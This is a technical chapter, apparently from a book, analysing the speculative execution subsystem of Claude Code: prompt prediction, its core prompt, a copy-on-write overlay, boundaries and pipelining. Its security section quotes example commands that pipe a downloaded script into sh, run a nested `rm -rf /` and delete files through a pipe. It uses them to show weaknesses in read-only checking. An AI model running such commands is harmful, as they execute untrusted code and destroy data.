# Complete Analysis of the Speculative Execution Subsystem

Speculative execution is the most aggressive performance optimization subsystem in Claude Code—it predicts the next command before the user even types it and begins executing. A correct guess reduces latency to zero; a wrong guess is silently discarded. This system borrows ideas from CPU speculative execution, using a userspace Copy-on-Write overlay filesystem to implement a safe "act first, ask later" approach. This chapter provides an in-depth analysis of the complete mechanism, including prompt prediction, COW path rewriting, the boundary system, and pipelined prediction chains.

> **Source locations**: `src/services/promptSuggestion/`, `src/utils/speculation/`, `src/services/speculative/`

> 💡 **Plain English**: Speculative execution is like a delivery company shipping items you **might buy** to a nearby warehouse before you even place the order—betting on your purchase history to guess what you'll want next. If the bet pays off, your order arrives instantly. If not, the items are quietly returned, and you never notice. The key word is "bet"—this isn't deterministic prep work, but wagering under uncertainty. (Similar to Amazon's anticipatory shipping patent.)

> 🌍 **Industry Context**: In the AI coding tools space, speculative execution is a cutting-edge optimization strategy that has yet to become widespread. **GitHub Copilot** speculates at the completion level—it predicts the next line of code as you type, but does not pre-execute filesystem operations. **Cursor**'s Tab completion is also lightweight prediction without tool invocation. **Aider** and **Windsurf** have no speculative execution mechanism; every turn is user-triggered. Claude Code's speculative execution implements a complete "predict → execute → rollback" loop at the application layer, including filesystem isolation, which is indeed a relatively uncommon design among AI coding tools. However, note that "speculative execution" itself is a classic concept in CPU architecture (e.g., Intel's Tomasulo algorithm, branch prediction) and databases (optimistic concurrency control, OCC). Claude Code's innovation lies in **porting these ideas to the AI Agent tool-calling scenario** and solving the rollback problem with a userspace COW mechanism.

---

## Overview

Speculation is Claude Code's most aggressive performance optimization—while the user hasn't even started typing, the system has already predicted what they will say and begun executing that command. If the prediction is correct, latency drops to zero. If it's wrong, the result is silently discarded.

This system borrows from CPU speculative execution, but adds a more complex challenge: whereas a CPU only needs to rollback register state, Claude Code's speculation must rollback **filesystem writes**. The solution is a userspace Copy-on-Write overlay filesystem.

---

> **[Chart placeholder 3.2-A]**: Sequence diagram—complete timeline from AI response completion → suggestion generation → speculative execution → user accept/reject, with CacheSafeParams reuse points annotated

> **[Chart placeholder 3.2-B]**: Architecture diagram—Copy-on-Write overlay filesystem read/write paths (overlay → main path rewriting logic)

---

## 1. System Entry Points and Enablement Conditions

### 1.1 Prompt Suggestion Enablement Chain

Prompt prediction is the prerequisite for speculative execution. `promptSuggestion.ts:37-93` defines five layers of enablement checks, plus a logging step:

```
1. env CLAUDE_CODE_ENABLE_PROMPT_SUGGESTION (true/false overrides everything)
2. GrowthBook gate: tengu_chomp_inflection (default false)
3. Non-interactive mode (print mode / piped input / SDK) → disabled
4. Swarm teammate → disabled (only the leader shows suggestions)
5. settings.promptSuggestionEnabled !== false
---
6. Log tengu_prompt_suggestion_init analytics event (note: this is not a "check" layer)
```

> **Clarification**: Step 6 is an analytics event log, not an enablement/disablement condition—it does not cause the feature to be enabled or disabled, but is a side-effect operation. Strictly speaking, the enablement chain is **five checks + one log**, not "six checks." We distinguish them here to avoid giving the impression of padding the count.

Each check records the reason for disabling (`source: 'env' | 'growthbook' | 'non_interactive' | 'swarm_teammate' | 'setting'`), meaning Anthropic can precisely track the distribution of each disabling scenario.

### 1.2 Speculation Enablement Check

`speculation.ts:337-343`:

```typescript
export function isSpeculationEnabled(): boolean {
  const enabled =
    process.env.USER_TYPE === 'ant' &&
    (getGlobalConfig().speculationEnabled ?? true)
  return enabled
}
```

Speculative execution is currently **ant-only**—only available to Anthropic internal users. However, it supports a configuration toggle via `getGlobalConfig().speculationEnabled`, which defaults to `true`.

## 2. Prompt Prediction (Prompt Suggestion)

### 2.1 Generation Flow

After the AI response completes, `executePromptSuggestion()` (`promptSuggestion.ts:184-200+`) starts:

```
1. Check querySource === 'repl_main_thread' (only runs on the main thread)
2. Create AbortController + CacheSafeParams
3. tryGenerateSuggestion():
   a. Skip if fewer than 2 assistant turns (assistantTurnCount < 2)
   b. Last assistant message is not an API error
   c. Parent request cache is large enough (see §2.2)
   d. No pending permission requests, no elicitation, not in plan mode, no rate limit
   e. generateSuggestion() → runForkedAgent()
   f. shouldFilterSuggestion() filters out inappropriate suggestions
```

### 2.2 CacheSafeParams and Cache Reuse

This is the **economic foundation** of speculative execution.

`CacheSafeParams` ensures the forked Agent's request shares the prompt cache with the parent request. Immutable parameters include: system prompt, tools list, model, message prefix, effortValue, and maxOutputTokens.

`promptSuggestion.ts:152-156`'s `getParentCacheSuppressReason()` checks whether the parent request has enough cached tokens—if uncached tokens exceed 10,000, suggestion generation is suppressed (because the fork would need to reprocess those tokens, making it too expensive).

**Lesson from PR #18143**: An attempt to reduce suggestion generation cost by using `effort:'low'` backfired because modifying the effort parameter (which affects thinking budget_tokens) caused cache hit rate to drop from 92.7% to 61%, triggering a 45x surge in cache write volume. This proved that the Anthropic API's prompt cache key includes more parameters than expected.

### 2.3 Suggestion Suppression Conditions

`getSuggestionSuppressReason()` (`promptSuggestion.ts:107-119`) defines five suppression scenarios:

| Condition | Reason |
|-----------|--------|
| Feature not enabled | `'disabled'` |
| Pending permission request | `'pending_permission'` |
| Elicitation queue active | `'elicitation_active'` |
| In plan mode | `'plan_mode'` |
| External user rate-limited | `'rate_limit'` |

## 2.4 SUGGESTION_PROMPT: The Core Prompt of the Predictor

**Source location**: `src/services/PromptSuggestion/promptSuggestion.ts`, lines 258–287

The core of the prompt prediction system is a constant named `SUGGESTION_PROMPT`, which defines the **complete behavioral specification** for the prediction AI fork. This is the most noteworthy design document in the subsystem and deserves standalone analysis:

```
[SUGGESTION MODE: Suggest what the user might naturally type next into Claude Code.]

FIRST: Look at the user's recent messages and original request.

Your job is to predict what THEY would type - not what you think they should do.

THE TEST: Would they think "I was just about to type that"?

EXAMPLES:
User asked "fix the bug and run tests", bug is fixed → "run the tests"
After code written → "try it out"
Claude offers options → suggest the one the user would likely pick, based on conversation
Claude asks to continue → "yes" or "go ahead"
Task complete, obvious follow-up → "commit this" or "push it"
After error or misunderstanding → silence (let them assess/correct)

Be specific: "run the tests" beats "continue".

NEVER SUGGEST:
- Evaluative ("looks good", "thanks")
- Questions ("what about...?")
- Claude-voice ("Let me...", "I'll...", "Here's...")
- New ideas they didn't ask about
- Multiple sentences

Stay silent if the next step isn't obvious from what the user said.

Format: 2-12 words, match the user's style. Or nothing.

Reply with ONLY the suggestion, no quotes or explanation.
```

**Analysis**: These 29 lines of prompt engineering represent the **crystallized cognitive model** of the entire speculative execution subsystem. Every line is a carefully weighed design decision:

**1. The Core Test: "Would they think 'I was just about to type that'?"**

This is the single most important guiding principle in the prompt. It transforms the abstract problem of "predicting user input" into a concrete psychological test: **from the user's perspective, does this suggestion feel like "exactly what I was going to say"?** This is not "what the AI thinks the user should say," but "what the user would naturally say"—there is an essential difference between the two. The former is the AI's subjective judgment; the latter is an objective prediction of user intent.

**2. The Logic Behind the Prohibition List**

The four bans in `NEVER SUGGEST` reveal common failure modes Anthropic discovered in experiments:
- "Evaluative" (e.g., "looks good"): Users don't praise the AI; this is the AI's tone;
- "Questions" (e.g., "what about...?"): The user's next message is a command, not a question;
- "Claude-voice" (e.g., "Let me..."): This is how the AI speaks, not how the user speaks—this ban prevents the model from getting too deep into character and confusing its role with the user's;
- "New ideas they didn't ask about": Prediction is conservative, not creative.

**3. The "Stay silent" Design**

`Stay silent if the next step isn't obvious`—the prompt explicitly allows an empty string output. This is a rare but important design: most generation tasks force the model to "output something," while this prompt requires the model to **actively stay silent** when uncertain. This corresponds to lines 284–285: `Format: ... Or nothing`.

**4. Format Constraint: 2–12 Words**

The output format is precisely quantified (2–12 words), not vaguely "short." This directly connects to the hard filter rules in `shouldFilterSuggestion()` (lines 354–455): `too_few_words` (< 2 words, unless on the whitelist) and `too_many_words` (> 12 words). The prompt's format requirements and the filter's thresholds are perfectly aligned—**the prompt and the filter code are two implementation layers of the same design**.

**5. The Role of Examples**

The six `EXAMPLES` in the prompt are not just illustrations, but **behavioral templates**: they cover the most common conversation scenarios (task completion, code just written, Claude offering options, Claude asking to continue, obvious post-task follow-up, staying silent after errors/misunderstandings). When predicting, the model can match the current conversation state to these templates, reducing variance in generation quality.

**Technical Note** (source lines 289–292): Although `SUGGESTION_PROMPT` is stored under two variant keys (`user_intent` and `stated_intent`), both keys have the exact same value—`const SUGGESTION_PROMPTS = { user_intent: SUGGESTION_PROMPT, stated_intent: SUGGESTION_PROMPT }`. This shows the A/B testing framework for "two variants" is already in place, but content divergence has not yet been implemented. This is a typical engineering decision of "reserving an extension point while keeping them merged for now"—maintaining interface flexibility without premature optimization.

## 3. Speculative Execution Core

### 3.1 Startup

`startSpeculation()` (`speculation.ts:402-715`) is the main entry point for speculation. The flow:

1. Terminate any existing speculation (`abortSpeculation()`)
2. Generate an 8-character UUID as the speculation ID
3. Create overlay directory: `~/.claude/tmp/speculation/<PID>/<UUID>/`
4. Set AppState.speculation to active
5. Call `runForkedAgent()` to begin execution

Key parameters:
- `maxTurns: 20` (`MAX_SPECULATION_TURNS`)
- `maxMessages: 100` (`MAX_SPECULATION_MESSAGES`)
- `querySource: 'speculation'`
- `requireCanUseTool: true` (all tools must pass canUseTool checks)

### 3.2 Copy-on-Write Overlay Filesystem

> 📚 **Design Inspiration and Implementation Differences**: COW (Copy-on-Write) is a core concept in **operating systems** courses—Linux's `fork()` system call uses COW to achieve memory isolation between parent and child processes: the child shares the parent's page tables, and only copies the corresponding memory page upon write. Claude Code borrows this idea, implementing file-level COW in userspace (rather than kernel space).
>
> However, the implementation differences must be clearly stated:
> - **Difference from OverlayFS**: Linux OverlayFS merging is **transparently completed** by the kernel during file access; there is no explicit "copy back to main directory" call. Claude Code's `copyOverlayToMain()` is closer to a **staging area + commit** model—similar to Git's staging area → commit relationship, where files must be explicitly copied back to the main directory one by one. The overlay directory is not an upper layer in the OverlayFS sense, but a temporary staging area for isolating writes.
> - **Difference from the Reorder Buffer (ROB)**: A CPU's ROB is a sophisticated hardware mechanism responsible for ensuring in-order instruction commit, involving register renaming, precise exception handling, and inter-instruction dependency detection. Claude Code's overlay directory has none of these semantics—there is no order tracking between multiple file writes in the overlay, nor dependency detection. More accurately, the overlay is a **simplified transaction staging area**: on commit, it writes back to the main directory in batch; on abort, the entire staging area is discarded.
>
> 💡 **Plain English**: You can think of the overlay directory as scratch paper—you do your calculations on scratch paper, copy the final answer to the official notebook when you're confident, and simply tear up the scratch paper if you made a mistake.

This is a pragmatic engineering design in the speculation system. The `canUseTool` callback (`speculation.ts:461-632`) implements the path rewriting logic:

**Write Operations (Edit/Write/NotebookEdit)**:

```
1. Check permission mode (only acceptEdits/bypassPermissions allowed)
2. Compute relative path = relative(cwd, filePath)
3. If path is outside cwd → reject
4. If file not yet in overlay → copy original file to overlay (COW semantics)
5. Rewrite file_path in input to overlay path
6. Record in writtenPathsRef
```

**Read Operations (Read/Glob/Grep/ToolSearch/LSP/TaskGet/TaskList)**:

```
1. If file has been speculatively written → rewrite path to overlay (read speculative version)
2. Otherwise → do not rewrite (read original)
3. Pathless read operations (e.g., Glob default CWD) → allow directly
```

**Bash Commands**:

```
1. Call checkReadOnlyConstraints() to verify command is read-only
2. Read-only command → allow
3. Non-read-only command → record boundary (type: 'bash', command), abort speculation
```

**All Other Tools** → reject and record boundary (type: 'denied_tool').

### 3.3 Four Boundaries

When speculation encounters an unhandleable operation, it records a boundary and stops:

| Type | Trigger Condition | Recorded Content |
|------|-------------------|------------------|
| `bash` | Non-read-only bash command | command (truncated to 200 chars) |
| `edit` | File edit outside acceptEdits mode | toolName + filePath |
| `denied_tool` | Tool not on the whitelist | toolName + detail (truncated to 200 chars) |
| `complete` | Speculation completed normally (20 turns or model stop) | outputTokens |

### 3.4 Message Injection Preprocessing

`prepareMessagesForInjection()` (`speculation.ts:203-271`) cleans up speculation messages before they are injected into the main session:

1. **Remove thinking/redacted_thinking blocks** — speculative reasoning should not be injected
2. **Remove failed tool_use + tool_result pairs** — only successful tool calls are retained
3. **Remove interrupt messages** — interruption messages produced by speculation abort should not appear
4. **Remove blank-content messages** — the API rejects all-whitespace text blocks (400 error)

### 3.5 Accepting Speculation

`acceptSpeculation()` (`speculation.ts:717-800`):

```
1. Get overlayPath and writtenPaths
2. Call copyOverlayToMain() — copy overlay files back to main directory
3. Delete overlay directory
4. Calculate timeSavedMs = min(acceptedAt, boundary.completedAt) - startTime
5. Accumulate into speculationSessionTimeSavedMs
6. Record in transcript (speculation-accept type)
7. Return { messages, boundary, timeSavedMs }
```

The `timeSavedMs` calculation uses `min(acceptedAt, completedAt)` rather than simply `completedAt - startTime`—because if the user accepted the suggestion before speculation completed (while it was still running), the time saved is the user's wait time, not the speculation execution time.

### 3.6 Rejecting/Aborting Speculation

`abortSpeculation()` (`speculation.ts:802-833`):

```
1. Record abort_reason: 'user_typed'
2. Call abort() to terminate forkedAgent
3. Delete overlay directory
4. Reset AppState.speculation to IDLE
```

## 4. Pipelining

> 📚 **Course Connection**: The pipelined prediction chain directly corresponds to the "Instruction Pipeline" concept in **computer architecture**—while the current instruction is executing, the next is already being decoded, and the one after that is already being fetched. Claude Code's pipeline is: while current speculation is executing, the next suggestion is already being generated. This is also a manifestation of the "Prefetch" strategy in **database** courses—based on the assumption of temporal locality, data likely to be needed soon is loaded in advance.

`generatePipelinedSuggestion()` (`speculation.ts:345-399`):

After speculation completes, the system immediately begins generating the **next** suggestion. The flow:

1. Construct augmentedContext = original messages + speculative user message + speculative assistant response
2. Create new CacheSafeParams (based on augmented context)
3. Call `generateSuggestion()` to predict what the user will type after accepting the current speculation
4. Store result in `pipelinedSuggestion`

If the user accepts the current speculation, the pipelined suggestion immediately becomes the next suggestion—no need to wait for a new prediction. This forms a **prediction chain**: predict → speculate → pipeline prediction → user accepts → pipelined suggestion becomes new suggestion → new speculation…

## 5. Feedback and Observability

### 5.1 Ant-Only Feedback Message

`createSpeculationFeedbackMessage()` (`speculation.ts:273-308`) displays the following to ant users after speculation is accepted:

```
[ANT-ONLY] Speculated 5 tool uses · 1,234 tokens · +3.2s saved (12.5s this session)
```

### 5.2 Analytics Events

Every speculation (accepted/aborted/error) logs a `tengu_speculation` event with dimensions:

- `speculation_id`: 8-character UUID
- `outcome`: accepted / aborted / error
- `duration_ms`: speculation duration
- `suggestion_length`: suggestion text length
- `tools_executed`: number of successfully executed tools
- `completed`: whether it completed normally
- `boundary_type/tool/detail`: boundary information
- `time_saved_ms`: time saved (accepted only)
- `is_pipelined`: whether it was a pipelined speculation

### 5.3 Transcript Persistence

Accepted speculations are written to the transcript file (`speculation.ts:784-797`), in this format:

```json
{"type":"speculation-accept","timestamp":"2026-04-02T...","timeSavedMs":3200}
```

File permissions are `0o600`—only the current user can read or write.

## 6. Security Analysis

### 6.1 Filesystem Isolation

- **Write isolation**: All writes are redirected to the overlay directory
- **Path traversal protection**: `relative(cwd, filePath)` rejects absolute paths or paths starting with `..`
- **Permission checks**: Write tools require `acceptEdits` or `bypassPermissions` mode
- **Bash isolation**: Only read-only commands are allowed (verified via `checkReadOnlyConstraints()`)

> ⚠️ **Security Weakness: Reliability of `checkReadOnlyConstraints()`**
>
> Determining whether a bash command is "read-only" is, in the general case, an **undecidable problem**. Consider these examples:
> - `cat file | python -c "import os; os.remove('foo')"` — looks read-only on the surface (`cat`), but actually performs file deletion through the pipe
> - `curl https://example.com/script.sh | sh` — `curl` itself is read-only, but the `sh` after the pipe can execute arbitrary operations
> - `$(rm -rf /)` nested inside any seemingly harmless command
>
> The full implementation strategy of `checkReadOnlyConstraints()` is not exposed in the source—it could be based on a command whitelist (only known read-only commands like `cat`/`ls`/`grep` are allowed), a blacklist (known write commands like `rm`/`mv`/`write` are excluded), or more complex command parsing (AST analysis). We cannot determine which. But regardless of the strategy, there is a risk of false negatives (failing to recognize a non-read-only command as such).
>
> This is the **most vulnerable link** in the speculative execution security model: the COW overlay only isolates file writes made through the Claude Code tool layer, while bash commands can bypass the tool layer and directly manipulate the filesystem. If `checkReadOnlyConstraints()` misclassifies a write command as read-only, that write will directly affect the main directory rather than the overlay, and cannot be rolled back. In the context of speculative execution (where a wrong guess should have no side effects), the consequences of such a misclassification are particularly severe.

### 6.2 Leakage Risk

- The overlay directory is at `~/.claude/tmp/speculation/<PID>/<UUID>/`; if the process crashes, the overlay may be left behind
- `safeRemoveOverlay()` uses `maxRetries: 3, retryDelay: 100` for best-effort cleanup
- The PID subdirectory means overlays from different processes will not conflict

### 6.3 Consistency Risk

- Speculation reads the overlay-written version of a file—but if an external process simultaneously modifies the main directory file, speculation sees the stale version
- There is no file locking mechanism—COW is an "optimistic" strategy
- The `copyOverlayToMain()` on acceptance is a file-by-file copy, not an atomic operation—a crash midway could result in a partial update

## 7. Performance Characteristics

| Metric | Value | Source |
|--------|-------|--------|
| Max speculation turns | 20 | `MAX_SPECULATION_TURNS` (speculation.ts:58) |
| Max messages | 100 | `MAX_SPECULATION_MESSAGES` (speculation.ts:59) |
| Cache suppression threshold | 10,000 uncached tokens | `getParentCacheSuppressReason()` |
| Overlay cleanup retries | 3 times, 100ms interval | `safeRemoveOverlay()` (speculation.ts:72-78) |
| Boundary command truncation | 200 characters | `getBoundaryDetail()` (speculation.ts:188) |

## 8. GrowthBook Gates

| Gate | Function |
|------|----------|
| `tengu_chomp_inflection` | Prompt Suggestion enablement (default false) |
| ant-only | Speculation enablement (no GrowthBook gate, hardcoded USER_TYPE check) |

## 9. Design Trade-offs and Evaluation

**Strengths**:
1. The COW overlay achieves userspace file write isolation with `mkdir + copyFile + path string replacement`—a simple, direct approach that requires no kernel-level filesystem support
2. CacheSafeParams reuse makes suggestion generation nearly free
3. Pipelining forms a prediction chain, allowing the next suggestion to be pre-generated while current speculation is executing (but note: multi-level pipelining is limited by the exponential decay of prediction accuracy—if single-step accuracy is 60%, three-level pipelining has a joint accuracy of only ~21.6%, so more than two levels may be net negative)
4. The boundary system cleanly handles the "speculation stops here" semantics
5. Every speculation has complete analytics events, so ROI can be precisely calculated

**Costs**:
1. The ant-only restriction means external users cannot benefit from this optimization
2. Exact string matching means even slight wording variations (e.g., adding punctuation) waste the entire speculation
3. Non-atomic overlay→main copying carries a risk of partial updates
4. 20 turns × API calls = the cost of a wrong prediction can be quite high
5. The overlay path rewriting logic only handles `file_path`/`path`/`notebook_path`—if a tool uses another field to pass a path, rewriting will fail

### 9.1 Missing Effectiveness Data

> **Honest disclosure**: As of this writing, there is no publicly available data on speculative execution hit rate, cost model, or ROI. This is a significant limitation of this chapter's analysis.

We can **infer** from the observability design what metrics Anthropic is tracking:
- The `time_saved_ms` field → they are quantifying saved user wait time
- The `is_pipelined` field → they are evaluating the incremental value of pipelining
- The `tools_executed` field → they are tracking the actual workload of each speculation
- The `boundary_type` field → they are analyzing the distribution of why speculations are aborted

But these telemetry fields only show that Anthropic **is collecting** this data; they don't tell us the results. Without data, we cannot answer several key questions:

1. **What is the prediction hit rate?** If it is below 50%, speculative execution may be net negative (wasted API calls > saved wait time)
2. **What is the cost of a wrong prediction?** Assuming ~500 tokens per turn, the 20-turn ceiling means worst-case consumption is 10,000 tokens
3. **What does the persistent ant-only status imply?** A "most aggressive performance optimization" remaining internal-only long after release could mean: (a) prediction accuracy is still not high enough, (b) the cost/benefit ratio has not yet met the threshold, (c) the security model still needs hardening, or (d) it's purely a product pacing decision. Regardless of the reason, this fact alone indicates Anthropic remains cautious about externally rolling out this feature.

**Why this matters**: When readers evaluate whether to borrow the speculative execution pattern for their own systems, they need to know whether it is "a clever but unproven experiment" or "a validated killer feature." Without effectiveness data, we are inclined to position it as the former—a design idea worth learning from, but an experimental optimization whose ROI remains to be validated.

### 9.2 Exact Match vs. Semantic Match: A Core Design Trade-off

Speculative execution acceptance uses **exact string matching**—the user's input must exactly match the predicted text for the speculation result to be adopted. This means even if user intent is identical, any slight difference in phrasing (an extra punctuation mark, a different wording) causes the entire speculation to be discarded.

Why not use semantic matching (e.g., embedding similarity > 0.95)? There is a deep trade-off here:

**Advantages of exact matching**:
- **High safety**: No risk of false acceptance due to "semantically similar but subtly different intent" (e.g., "delete test files" vs. "delete test data")
- **Simple implementation**: String comparison is O(n), requiring no additional model calls or embedding computation
- **Predictable**: Both users and developers can clearly understand the matching rule

**Costs of exact matching**:
- **Hit rate ceiling**: When the predicted wording is correct but the user's phrasing differs slightly, all speculative computation is wasted
- **Unfriendly to natural language**: Natural language is inherently diverse, and exact matching runs counter to this property

**Potential risks of semantic matching**:
- Requires additional inference cost (embedding computation or model call) to judge similarity
- Setting the similarity threshold is itself a hard problem—0.95 may miss reasonable variations, while 0.85 may falsely accept different intents
- In scenarios involving filesystem writes, the consequences of false acceptance are far more severe than false rejection

From an engineering perspective, choosing exact matching is a **conservative but safe** strategy, consistent with the core constraint of speculative execution that "a wrong guess must have no side effects." But this also means there is a ceiling on hit rate—even if the prediction model perfectly captures user intent, any variation in user phrasing causes the speculation to fail. This may be one reason the feature remains in the ant-only stage.

## 10. Reusable Design Patterns

1. **Userspace COW Overlay**: Achieve write isolation with `mkdir + copyFile + path rewriting`, without requiring kernel-level filesystem support
   - *Applicable scenarios*: Few files, single-user, scenarios where atomicity requirements are not strict
   - *Anti-patterns*: High-concurrency writes, large file scenarios, scenarios requiring directory-level operations (create/delete directories)—in these cases, consider kernel-level solutions like Docker overlay2 or ZFS snapshots
2. **Cache-safe Forking**: Any "side task" shares the parent request's investment by keeping cache parameters unchanged
   - *Applicable scenarios*: APIs provide prompt cache and the cache key includes request parameters
   - *Anti-patterns*: When the side task requires different model/effort/tools configurations, forcibly keeping parameters unchanged will limit side task quality
3. **Boundary-based Speculation**: Not "all-or-nothing," but "do as much as possible, stop when you hit a boundary"
   - *Applicable scenarios*: Scenarios where the side effects of each step in an operation sequence can be independently rolled back
   - *Anti-patterns*: When steps have strong dependencies (e.g., output of A is input to B), partial execution may produce inconsistent state
4. **Pipeline Prediction Chain**: Immediately predict the next step after speculation completes, preparing the next suggestion in advance
   - *Applicable scenarios*: Scenarios where single-step prediction accuracy is relatively high (> 50%)
   - *Anti-patterns*: When accuracy is below 50%, pipelining is net negative—each additional level of pipelining causes joint accuracy to decay exponentially, and wasted computation quickly exceeds saved wait time

---

*Quality self-check:*
- [x] Coverage: complete deep read of all 850 lines of speculation.ts, complete deep read of 200+ lines of promptSuggestion.ts
- [x] Fidelity: all constants, line numbers, and function signatures are from the source code
- [x] Depth: complete analysis of COW path rewriting, boundary system, pipelining, and security model
- [x] Criticality: identified non-atomic copying, exact matching limitations, path rewriting blind spots, and the checkReadOnlyConstraints security weakness
- [x] Honesty: noted missing effectiveness data, distinguished the five checks from the log record, corrected technical analogies
- [x] Trade-offs: analyzed the exact match vs. semantic match design trade-off
- [x] Reusability: four design patterns with applicable conditions and anti-patterns
